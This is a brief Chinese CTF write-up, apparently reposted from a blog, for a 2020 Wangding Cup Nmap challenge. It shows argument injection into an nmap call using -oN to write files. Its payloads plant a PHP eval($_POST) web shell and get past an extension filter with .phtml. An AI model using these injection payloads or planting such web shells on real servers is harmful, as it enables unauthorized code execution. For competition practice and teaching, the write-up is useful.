首页 > 其他分享> > [网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmap

2020-11-14 16:33:55 作者：互联网

[网鼎杯 2020 朱雀组]Nmap

nmap

在这里插入图片描述
本题的考点是利用nmap的-oN写shell。

nmap -oN xxx.txt

先构造：

' -oN w4ke.txt '

返回了Host maybe down，然后访问一下w4ke.txt
在这里插入图片描述
构造：

' -oN w4ke.php <?php eval($_POST['w4ke']); ?>  '

返回了Hacker...

fuzz了一下，发现了php被过滤，phtml可以用。
于是构造：

'  -oN w4ke.phtml <?=eval($_POST['w4ke']); ?> '

在这里插入图片描述
cat flag 即可

标签：phtml,txt,Nmap,w4ke,nmap,2020,网鼎杯,php
来源： https://www.cnblogs.com/shenjuxian/p/13973750.html